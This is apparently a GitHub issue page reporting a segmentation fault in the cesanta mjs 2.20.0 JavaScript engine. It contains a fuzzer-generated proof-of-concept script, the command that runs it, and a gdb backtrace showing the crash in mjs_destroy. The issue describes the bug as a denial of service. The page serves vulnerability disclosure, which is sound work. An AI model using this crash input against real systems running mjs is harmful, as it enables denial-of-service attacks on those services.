You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
let i, a = 0, b0= 0, c = 0continu, d0, e = 0;
for (i = 8; i < 20; i++) {
a let z = JSON.parse('""'); // Zlength string
let s2 = JSON.stringify+=888 i;
c /= 0, c = 0let s = '08888888888888 true, "d": [null], "e": "1\\n2"}';
let o = JSON.parse(s);
let z = JSON.parse('""'); // Zlength string
let s2 = JSON.stringify(o)AAA
run command
mjs -f poc
gdb info
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x000000000040c168 in mjs_destroy (mjs=0x1db2260) at mjs.c:7563
7563 mbuf_free(&mjs->json_visited_stack);
(gdb) bt
#0 0x000000000040c168 in mjs_destroy (mjs=0x1db2260) at mjs.c:7563
#1 0x000000000040d413 in mjs_exec_internal (mjs=0x1db2260,
path=0x7ffd203438b4 "/cve/mjs_latest/pending3/id:000167,sig:06,src:003368,time:694819496,execs:215291083,op:havoc,rep:1",
src=0x1db3cb0 "let i, a = 0, b0= 0, c = 0continu, d0, e = 0;\n\nfor (i = 8; i < 20; i++) {\n a let z = JSON.parse('\"\"'); // Zlength string\nlet s2 = JSON.stringify+=888 i;\nc /= 0, c = 0let s = '0", '8' <repeats 13 times>, " true,"..., generate_jsc=0, res=0x7ffd20341a58)
at mjs.c:9044
#2 0x000000000040d4d5 in mjs_exec_file (mjs=0x1db2260,
path=0x7ffd203438b4 "/cve/mjs_latest/pending3/id:000167,sig:06,src:003368,time:694819496,execs:215291083,op:havoc,rep:1",
res=0x7ffd20341aa0) at mjs.c:9067
#3 0x000000000041082e in main (argc=3, argv=0x7ffd20341ba8) at mjs.c:11406
(gdb) list
7558 mbuf_free(&mjs->owned_strings);
7559 mbuf_free(&mjs->foreign_strings);
7560 mbuf_free(&mjs->owned_values);
7561 mbuf_free(&mjs->scopes);
7562 mbuf_free(&mjs->loop_addresses);
7563 mbuf_free(&mjs->json_visited_stack);
7564 free(mjs->error_msg);
7565 free(mjs->stack_trace);
7566 mjs_ffi_args_free_list(mjs);
7567 gc_arena_destroy(mjs, &mjs->object_arena);
The text was updated successfully, but these errors were encountered:
The name of an affected Product
mjs
The affected version
Commit: b1b6eac (Tag: 2.20.0)
Description
An issue in cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_destroy function in the mjs.c file.
Vulnerability Type
Segmentation fault on program counter
Environment
Steps to Reproduce
poc
run command
gdb info
The text was updated successfully, but these errors were encountered: